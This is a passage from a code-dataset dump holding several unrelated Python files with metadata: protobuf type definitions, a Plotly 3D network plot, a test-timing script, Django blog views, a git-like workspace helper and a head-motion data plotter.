Optional: The number of retries for\n a process in submission mode\n the system should try before declaring failure.\n By default, no retry will be performed.\n \"\"\"\n\n name: str = proto.Field(\n proto.STRING,\n number=1,\n )\n create_time: timestamp_pb2.Timestamp = proto.Field(\n proto.MESSAGE,\n number=2,\n message=timestamp_pb2.Timestamp,\n )\n update_time: timestamp_pb2.Timestamp = proto.Field(\n proto.MESSAGE,\n number=3,\n message=timestamp_pb2.Timestamp,\n )\n analysis: str = proto.Field(\n proto.STRING,\n number=4,\n )\n attribute_overrides: MutableSequence[str] = proto.RepeatedField(\n proto.STRING,\n number=5,\n )\n run_status: lva.RunStatus = proto.Field(\n proto.MESSAGE,\n number=6,\n message=lva.RunStatus,\n )\n run_mode: lva.RunMode = proto.Field(\n proto.ENUM,\n number=7,\n enum=lva.RunMode,\n )\n event_id: str = proto.Field(\n proto.STRING,\n number=8,\n )\n batch_id: str = proto.Field(\n proto.STRING,\n number=9,\n )\n retry_count: int = proto.Field(\n proto.INT32,\n number=10,\n )\n\n\n__all__ = tuple(sorted(__protobuf__.manifest))\n", "repo_name": "google/visionai", "sub_path": "visionai/python/gapic/visionai/visionai_v1/types/lva_resources.py", "file_name": "lva_resources.py", "file_ext": "py", "file_size_in_byte": 7025, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 40, "dataset": "github-code", "pt": "86", "api": [{"api_name": "proto.module", "line_number": 11, "usage_type": "call"}, {"api_name": "proto.Message", "line_number": 21, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 39, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 40, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2.Timestamp", "line_number": 43, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2", "line_number": 43, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 43, "usage_type": "call"}, {"api_name": "proto.MESSAGE", "line_number": 44, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2.Timestamp", "line_number": 46, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2", "line_number": 46, "usage_type": "name"}, {"api_name": "google.protobuf.timestamp_pb2.Timestamp", "line_number": 48, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2", "line_number": 48, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 48, "usage_type": "call"}, {"api_name": "proto.MESSAGE", "line_number": 49, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2.Timestamp", "line_number": 51, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2", "line_number": 51, "usage_type": "name"}, {"api_name": "typing.MutableMapping", "line_number": 53, "usage_type": "name"}, {"api_name": "proto.MapField", "line_number": 53, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 54, "usage_type": "attribute"}, {"api_name": "proto.STRING", "line_number": 55, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva.OperatorDefinition", "line_number": 58, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva", "line_number": 58, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 58, "usage_type": "call"}, {"api_name": "proto.MESSAGE", "line_number": 59, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva.OperatorDefinition", "line_number": 61, "usage_type": 
"attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva", "line_number": 61, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 63, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 64, "usage_type": "attribute"}, {"api_name": "proto.Message", "line_number": 69, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 104, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 105, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2.Timestamp", "line_number": 108, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2", "line_number": 108, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 108, "usage_type": "call"}, {"api_name": "proto.MESSAGE", "line_number": 109, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2.Timestamp", "line_number": 111, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2", "line_number": 111, "usage_type": "name"}, {"api_name": "google.protobuf.timestamp_pb2.Timestamp", "line_number": 113, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2", "line_number": 113, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 113, "usage_type": "call"}, {"api_name": "proto.MESSAGE", "line_number": 114, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2.Timestamp", "line_number": 116, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2", "line_number": 116, "usage_type": "name"}, {"api_name": "typing.MutableMapping", "line_number": 118, "usage_type": "name"}, {"api_name": "proto.MapField", "line_number": 118, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 119, "usage_type": "attribute"}, {"api_name": "proto.STRING", "line_number": 120, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva.AnalysisDefinition", "line_number": 123, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva", "line_number": 123, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 123, "usage_type": "call"}, {"api_name": "proto.MESSAGE", "line_number": 124, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva.AnalysisDefinition", "line_number": 126, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva", "line_number": 126, "usage_type": "name"}, {"api_name": "typing.MutableMapping", "line_number": 128, "usage_type": "name"}, {"api_name": "proto.MapField", "line_number": 128, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 129, "usage_type": "attribute"}, {"api_name": "proto.STRING", "line_number": 130, "usage_type": "attribute"}, {"api_name": "typing.MutableMapping", "line_number": 133, "usage_type": "name"}, {"api_name": "proto.MapField", "line_number": 133, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 134, "usage_type": "attribute"}, {"api_name": "proto.STRING", "line_number": 135, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 138, "usage_type": "call"}, {"api_name": "proto.BOOL", "line_number": 139, "usage_type": "attribute"}, {"api_name": "proto.Message", "line_number": 144, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 180, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 181, "usage_type": "attribute"}, {"api_name": 
"google.protobuf.timestamp_pb2.Timestamp", "line_number": 184, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2", "line_number": 184, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 184, "usage_type": "call"}, {"api_name": "proto.MESSAGE", "line_number": 185, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2.Timestamp", "line_number": 187, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2", "line_number": 187, "usage_type": "name"}, {"api_name": "google.protobuf.timestamp_pb2.Timestamp", "line_number": 189, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2", "line_number": 189, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 189, "usage_type": "call"}, {"api_name": "proto.MESSAGE", "line_number": 190, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2.Timestamp", "line_number": 192, "usage_type": "attribute"}, {"api_name": "google.protobuf.timestamp_pb2", "line_number": 192, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 194, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 195, "usage_type": "attribute"}, {"api_name": "typing.MutableSequence", "line_number": 198, "usage_type": "name"}, {"api_name": "proto.RepeatedField", "line_number": 198, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 199, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva.RunStatus", "line_number": 202, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva", "line_number": 202, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 202, "usage_type": "call"}, {"api_name": "proto.MESSAGE", "line_number": 203, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva.RunStatus", "line_number": 205, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva", "line_number": 205, "usage_type": "name"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva.RunMode", "line_number": 207, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva", "line_number": 207, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 207, "usage_type": "call"}, {"api_name": "proto.ENUM", "line_number": 208, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva.RunMode", "line_number": 210, "usage_type": "attribute"}, {"api_name": "visionai.python.gapic.visionai.visionai_v1.types.lva", "line_number": 210, "usage_type": "name"}, {"api_name": "proto.Field", "line_number": 212, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 213, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 216, "usage_type": "call"}, {"api_name": "proto.STRING", "line_number": 217, "usage_type": "attribute"}, {"api_name": "proto.Field", "line_number": 220, "usage_type": "call"}, {"api_name": "proto.INT32", "line_number": 221, "usage_type": "attribute"}]} +{"seq_id": "29939072776", "text": "# $ sudo apt install build-essential python-dev libxml2 libxml2-dev zlib1g-dev\n# $ pip install python-igraph \n\nimport igraph as ig\nimport json\nimport requests\n\n# Import the Json\ndata = []\nr = requests.get(url='https://raw.githubusercontent.com/plotly/datasets/master/miserables.json')\nprint(r.json())\ndata = r.json()\nprint(data.keys())\n\n# Get the Number of 
Nodes\nN=len(data['nodes'])\nN\n\n# Define the list of edges and the Graph object from Edges:\nL=len(data['links'])\nEdges=[(data['links'][k]['source'], data['links'][k]['target']) for k in range(L)]\n\nG=ig.Graph(Edges, directed=False)\n\n# Extract the node attributes, 'group', and 'name':\ndata['nodes'][0]\nlabels=[]\ngroup=[]\nfor node in data['nodes']:\n labels.append(node['name'])\n group.append(node['group'])\n\n# Get the node positions, set by the Kamada-Kawai layout for 3D graphs:\nlayt=G.layout('kk', dim=3)\n\n# layt is a list of three elements lists (the coordinates of nodes):\nlayt[5]\n\n# Set data for the Plotly plot of the graph:\n\n\nXn=[layt[k][0] for k in range(N)]# x-coordinates of nodes\nYn=[layt[k][1] for k in range(N)]# y-coordinates\nZn=[layt[k][2] for k in range(N)]# z-coordinates\nXe=[]\nYe=[]\nZe=[]\nfor e in Edges:\n Xe+=[layt[e[0]][0],layt[e[1]][0], None]# x-coordinates of edge ends\n Ye+=[layt[e[0]][1],layt[e[1]][1], None]\n Ze+=[layt[e[0]][2],layt[e[1]][2], None]\n\n\n\n\nimport chart_studio.plotly as py\nimport plotly.graph_objs as go\n\ntrace1=go.Scatter3d(x=Xe,\n y=Ye,\n z=Ze,\n mode='lines',\n line=dict(color='rgb(125,125,125)', width=1),\n hoverinfo='none'\n )\n\ntrace2=go.Scatter3d(x=Xn,\n y=Yn,\n z=Zn,\n mode='markers',\n name='actors',\n marker=dict(symbol='circle',\n size=6,\n color=group,\n colorscale='Viridis',\n line=dict(color='rgb(50,50,50)', width=0.5)\n ),\n text=labels,\n hoverinfo='text'\n )\n\naxis=dict(showbackground=False,\n showline=False,\n zeroline=False,\n showgrid=False,\n showticklabels=False,\n title=''\n )\n\nlayout = go.Layout(\n title=\"Network of coappearances of characters in Victor Hugo's novel
Les Miserables (3D visualization)\",\n width=1000,\n height=1000,\n showlegend=False,\n scene=dict(\n xaxis=dict(axis),\n yaxis=dict(axis),\n zaxis=dict(axis),\n ),\n margin=dict(\n t=100\n ),\n hovermode='closest',\n annotations=[\n dict(\n showarrow=False,\n text=\"Data source: [1] miserables.json\",\n xref='paper',\n yref='paper',\n x=0,\n y=0.1,\n xanchor='left',\n yanchor='bottom',\n font=dict(\n size=14\n )\n )\n ], )\n\n\n\n\n\ndata=[trace1, trace2]\nfig=go.Figure(data=data, layout=layout)\n\npy.iplot(fig, filename='Les-Miserables')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "RyanGreenup/DataSci", "sub_path": "Visual_Analytics/Assessment/the-marvel-universe-social-network/plotly3dnetwork/online_exemplar.py", "file_name": "online_exemplar.py", "file_ext": "py", "file_size_in_byte": 3219, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "requests.get", "line_number": 10, "usage_type": "call"}, {"api_name": "igraph.Graph", "line_number": 23, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Scatter3d", "line_number": 59, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 59, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter3d", "line_number": 67, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 67, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Layout", "line_number": 90, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 90, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 125, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 125, "usage_type": "name"}, {"api_name": "chart_studio.plotly.iplot", "line_number": 127, "usage_type": "call"}, {"api_name": "chart_studio.plotly", "line_number": 127, "usage_type": "name"}]} +{"seq_id": "30781720722", "text": "import argparse\nimport datetime\nimport re \nimport glob\nimport json\nimport os\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Counts number of fields in testrun dirs')\n parser.add_argument('--testrun-dir', help='Directory to check', required=True)\n\n args = parser.parse_args()\n trial_dirs = glob.glob(args.testrun_dir + '/*')\n\n total_testing_time = datetime.timedelta()\n total_steps = 0\n for trial_dir in sorted(trial_dirs):\n if not os.path.isdir(trial_dir):\n continue\n print(trial_dir)\n\n # aggregate the total number of steps\n cr_files = glob.glob(trial_dir + '/mutated-*.yaml')\n total_steps += len(cr_files)\n\n # aggregate the total time\n # parse the duration\n with open(trial_dir + '/result.json', 'r') as result_file:\n result = json.load(result_file)\n duration_str = result['duration']\n duration = datetime.datetime.strptime(duration_str, '%H:%M:%S')\n duration_delta = datetime.timedelta(hours=duration.hour, minutes=duration.minute, seconds=duration.second)\n total_testing_time += duration_delta\n \n print('Total time: %s' % str(total_testing_time))\n\n with open(args.testrun_dir + '/test.log', 'r') as test_log:\n lines = test_log.readlines()\n\n timestamp_sequence = []\n log_regex = r'^\\s*'\n log_regex += r'(\\d{4}-\\d{2}-\\d{2} \\d{2}:\\d{2}:\\d{2},\\d{3})'\n log_regex += r'\\s*'\n\n for line in lines:\n match = re.search(log_regex, line)\n if match:\n timestamp_sequence.append(match.group(1))\n\n start_timestamp = datetime.datetime.strptime(timestamp_sequence[0], '%Y-%m-%d %H:%M:%S,%f')\n end_timestamp = datetime.datetime.strptime(timestamp_sequence[-1], 
'%Y-%m-%d %H:%M:%S,%f')\n    total_time = end_timestamp - start_timestamp\n    print('Total time: %s' % str(total_time))\n", "repo_name": "xlab-uiuc/acto", "sub_path": "scripts/collect_time.py", "file_name": "collect_time.py", "file_ext": "py", "file_size_in_byte": 1946, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 23, "dataset": "github-code", "pt": "86", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 9, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 13, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 23, "usage_type": "call"}, {"api_name": "json.load", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 31, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 32, "usage_type": "call"}, {"api_name": "re.search", "line_number": 46, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 50, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 50, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 51, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 51, "usage_type": "attribute"}]} +{"seq_id": "6981052644", "text": "from django.shortcuts import render,redirect,reverse\nfrom django.http import HttpResponse\nfrom .forms import post_create_form,comments_to_post_form,EditPostForm\nfrom django.shortcuts import get_object_or_404\nfrom .models import Posts\nfrom django.views.generic import ListView\nfrom django.contrib.auth.decorators import login_required\n\n\ndef edit_posts(request,id):\n    object = get_object_or_404(Posts , pk=id)\n    if request.user == object.author:\n        form = EditPostForm(instance=object)\n        if request.method==\"POST\":\n            form = EditPostForm(request.POST , instance=object)\n            if form.is_valid():\n                form.save()\n                return redirect(reverse('success'))\n        context = {'form':form}\n        return render(request,'posts/editpost.html',context)\n    else:\n        return HttpResponse('you can not edit posts that are not yours')\n\n\n\ndef delete_posts(request,id):\n    object = get_object_or_404(Posts , pk=id)\n    if request.user == object.author:\n        if request.method==\"POST\":\n            object.delete()\n            return redirect(reverse('success'))\n        return render(request,'posts/deleteposts.html')\n    else:\n        return HttpResponse('you can not delete posts that are not yours')\n    \ndef postslistview(request):\n    posts = Posts.objects.all()\n    context={'posts':posts}\n    return render(request , 'posts/posts_list.html' , context)\n\n\n\n\n@login_required(redirect_field_name='/users/login')\ndef post_details_view(request , id):\n    post = get_object_or_404(Posts , id=id)\n    comments = Posts.objects.get(id=id).comments_set.all()\n    context = {'post': post , 'comments':comments}\n    return render(request ,'posts/post_details.html',context)\n\n\n\n\n\n@login_required(redirect_field_name='/users/login')\ndef create_post_view(request):\n    if request.method =='POST':\n        form= post_create_form(request.POST)\n        if form.is_valid():\n            instance = form.save(commit=False)\n            instance.author = request.user\n            instance.save()\n            return redirect(reverse('success'))\n    else:\n        form = post_create_form()\n\n    context = {'form':form}\n\n    return 
render(request , 'posts/post_create_form.html' ,context)\n\n@login_required(redirect_field_name='/users/login')\ndef comment_to_post_view(request,id):\n post = get_object_or_404(Posts,id =id)\n if request.method=='POST':\n form= comments_to_post_form(request.POST)\n if form.is_valid():\n instance=form.save(commit=False)\n instance.related_post=post\n instance.related_user=request.user\n instance.save()\n return redirect(reverse('success'))\n else:\n form = comments_to_post_form()\n\n post_id = post.id\n\n return render(request , 'posts/comments.html',context={'form':form,'post_id':post_id})\n\ndef search_view(request):\n if request.method=='GET':\n print(request.GET['searchino'])\n objects = Posts.objects.filter(title__icontains=request.GET['searchino'])\n print(objects)\n context = {'objects':objects }\n return render(request,'posts/search_results.html' , context)\n\n\n\n\n# Create your views here.\n", "repo_name": "hatem8311/Physics-Room-WebApplication-Django-2.2", "sub_path": "posts/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3167, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.shortcuts.get_object_or_404", "line_number": 11, "usage_type": "call"}, {"api_name": "models.Posts", "line_number": 11, "usage_type": "argument"}, {"api_name": "forms.EditPostForm", "line_number": 13, "usage_type": "call"}, {"api_name": "forms.EditPostForm", "line_number": 15, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.reverse", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 20, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 22, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 27, "usage_type": "call"}, {"api_name": "models.Posts", "line_number": 27, "usage_type": "argument"}, {"api_name": "django.shortcuts.redirect", "line_number": 31, "usage_type": "call"}, {"api_name": "django.shortcuts.reverse", "line_number": 31, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 32, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 34, "usage_type": "call"}, {"api_name": "models.Posts.objects.all", "line_number": 37, "usage_type": "call"}, {"api_name": "models.Posts.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "models.Posts", "line_number": 37, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 39, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 46, "usage_type": "call"}, {"api_name": "models.Posts", "line_number": 46, "usage_type": "argument"}, {"api_name": "models.Posts.objects.get", "line_number": 47, "usage_type": "call"}, {"api_name": "models.Posts.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "models.Posts", "line_number": 47, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 49, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 44, "usage_type": "call"}, {"api_name": "forms.post_create_form", "line_number": 58, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 63, "usage_type": "call"}, {"api_name": "django.shortcuts.reverse", "line_number": 63, "usage_type": "call"}, {"api_name": "forms.post_create_form", 
"line_number": 65, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 69, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 55, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 73, "usage_type": "call"}, {"api_name": "models.Posts", "line_number": 73, "usage_type": "argument"}, {"api_name": "forms.comments_to_post_form", "line_number": 75, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 81, "usage_type": "call"}, {"api_name": "django.shortcuts.reverse", "line_number": 81, "usage_type": "call"}, {"api_name": "forms.comments_to_post_form", "line_number": 83, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 87, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 71, "usage_type": "call"}, {"api_name": "models.Posts.objects.filter", "line_number": 92, "usage_type": "call"}, {"api_name": "models.Posts.objects", "line_number": 92, "usage_type": "attribute"}, {"api_name": "models.Posts", "line_number": 92, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 95, "usage_type": "call"}]} +{"seq_id": "3861825534", "text": "import pathspec\n\nfrom os import walk, path\nimport os\nimport codecs\nfrom pathlib import Path\n\n\nclass Dir:\n @classmethod\n def entries(cls, path):\n return os.listdir(path)\n\n\nclass Workspace:\n class MissingFile(Exception):\n pass\n\n class NoPermission(Exception):\n pass\n\n IGNORE = [\".\", \"..\", \".git\"]\n\n SPEC = pathspec.PathSpec(map(pathspec.patterns.GitWildMatchPattern, IGNORE))\n\n def __init__(self, pathname):\n self.pathname = pathname\n\n def list_files(self, pathname=None):\n\n blacklist_predicate = lambda f: not Workspace.SPEC.match_file(f)\n\n path = pathname or self.pathname\n\n if os.path.isdir(path):\n paths = []\n for (root, dirnames, filenames) in walk(path):\n fs = list(map(lambda path: os.path.join(root, path), filenames))\n filtered_fs = list(filter(blacklist_predicate, fs))\n paths.extend(filtered_fs)\n return paths\n elif os.path.exists(path):\n return [path]\n\n else:\n raise (Workspace.MissingFile(\"pathspec %s did not match any files\" % path))\n\n def read_file(self, path):\n try:\n f = codecs.open(os.path.join(self.pathname, path), \"r\", \"latin-1\")\n return f.read()\n except PermissionError:\n raise Workspace.NoPermission(\"open('%s'): Permission Denied\" % path)\n\n def stat_file(self, path):\n try:\n return os.stat(os.path.join(self.pathname, path))\n except PermissionError:\n raise Workspace.NoPermission(\"stat('%s'): Permission Denied\" % path)\n", "repo_name": "mattmarcello/pit", "sub_path": "lib/workspace.py", "file_name": "workspace.py", "file_ext": "py", "file_size_in_byte": 1619, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "os.listdir", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "argument"}, {"api_name": "pathspec.PathSpec", "line_number": 24, "usage_type": "call"}, {"api_name": "pathspec.patterns", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 33, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "argument"}, {"api_name": "os.walk", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", 
"line_number": 37, "usage_type": "argument"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "argument"}, {"api_name": "os.path.exists", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 43, "usage_type": "name"}, {"api_name": "os.path", "line_number": 46, "usage_type": "name"}, {"api_name": "codecs.open", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 53, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 59, "usage_type": "name"}]} +{"seq_id": "24003585091", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 13 09:56:26 2019\n\n@author: sanjeev\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider\nimport pandas as pd\nfrom sklearn.preprocessing import normalize\n\nFACTORS = [\"Head-RR\",\n \"Head-LL\",\n \"Head-CL\",\n \"Head-CR\",\n \"Nose-Down\",\n \"Nose-Up\",]\n\nDIMENSIONS = [\"X\",\n \"Y\",\n \"Z\",]\n\ndf = pd.read_csv(\"/Users/sanjeev/Documents/Projects/ProjectAssistant/HeadMotionData/Kannada/PavanIn/TrainingData/2016-05-28_16-17-34_PavanIn_Story1En.csv\")\ndf = df.loc[1:,:]\n\nfor f in FACTORS:\n diff_2 = []\n for d in DIMENSIONS:\n diff_2.append((df[f + \"-\" + d] - df[f + \"-\" + d].shift(1)) ** 2)\n df[f] = np.sum(np.array(diff_2).T, axis = 1)\n #df[f] = df[f] / np.nanmax(df[f])\n\ndf[\"word_location\"] = df[\"batch_start_time\"] + (df[\"word_start_time\"] + df[\"word_end_time\"]) / 2\n\nFACTORS.extend([\"interpolated_values_pitch\", \"interpolated_values_intensity\"])\nfor i in FACTORS:#df.columns[df.dtypes == 'float64']:\n df[i] = (df[i] - np.nanmin(df[i])) / (np.nanmax(df[i]) - np.nanmin(df[i]))\n \nfig, ax = plt.subplots(nrows = 1, squeeze = True, sharex = True, sharey = True)\n#plt.subplots_adjust(bottom=0.25)\n\nt = df[\"Time\"]#np.arange(0.0, 100.0, 0.05)\n\nfor n, f in enumerate(FACTORS):\n ax.plot(t, df[f] + n) \n \nax.plot(t, df[\"interpolated_values_pitch\"] + 6)\nax.plot(t, df[\"interpolated_values_intensity\"] + 7)\n#s = 100 * np.sin(2*np.pi*t)\n#l, = ax[1].plot(t,s)\nplt.axis([20, 30, 0, 8])\n\naxcolor = 'lightgoldenrodyellow'\naxpos = plt.axes([0.2, 0.05, 0.65, 0.03], facecolor=axcolor)\n\nsposx = Slider(axpos, 'Pos - X', 0, 300, valstep = 1)\n\ndef update(val):\n posx = sposx.val\n ax.axis([posx,posx+ 10, 0,8])#posy,posy + 0.1])\n fig.canvas.draw_idle()\n\nsposx.on_changed(update)\nsposy.on_changed(update)\n\nfor i in pd.DataFrame(sorted(filter(lambda x : np.isnan(x[1]) == False, zip(df[\"Time\"], df[\"sentences\"])), key = lambda x: x[0]), columns = [\"Time\", \"col\"]).groupby(\"col\").max()[\"Time\"]:\n ax.axvline(x = i, ls = '-', color = 'red', linewidth = 3.0)\n\nfor i in pd.DataFrame(sorted(filter(lambda x : np.isnan(x[1]) == False, zip(df[\"Time\"], df[\"sentences\"])), key = lambda x: x[0]), columns = [\"Time\", \"col\"]).groupby(\"col\").min()[\"Time\"]:\n ax.axvline(x = i, ls = '--', color = 'red', linewidth = 3.0) \n \nword_end_points = []\nword_start_points = []\nwords = []\nfor i, j in 
pd.DataFrame(sorted(filter(lambda x : np.isnan(x[1]) == False, zip(df[\"Time\"], df[\"word_location\"], df[\"sentences\"], df[\"word\"])), key = lambda x: x[0]), columns = [\"Time\", \"col\", \"sentences\", \"word\"]).groupby([\"col\"]):\n max_sen = max(j[\"sentences\"])\n ts = j[\"Time\"][j[\"sentences\"] == max_sen]\n word_end_points.append(max(ts))\n word_start_points.append(min(ts))\n words.append(j[\"word\"].values[0])\n \nfor i, j in zip(word_start_points, word_end_points):\n ax.axvline(x = i, ls = '--', color = 'green')\n ax.axvline(x = j, ls = '-', color = 'green')\n\nfor n, i in enumerate(zip(words, word_start_points, word_end_points)):\n#for i in set(zip(df[\"word\"],df[\"word_start_time\"], df[\"word_end_time\"], df[\"batch_start_time\"])):\n ax.text(x = (i[1] + i[2]) / 2, y = n % 8 + 0.5, s = i[0])\nplt.show()\n#pd.DataFrame(sorted(filter(lambda x : np.isnan(x[1]) == False, zip(df[\"Time\"], df[\"word_location\"])), key = lambda x: x[0]), columns = [\"Time\", \"col\"]).groupby(\"col\").max()\n\n", "repo_name": "SanjeevKV/gesturesynthesis", "sub_path": "PythonScripts/Plotter.py", "file_name": "Plotter.py", "file_ext": "py", "file_size_in_byte": 3462, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", 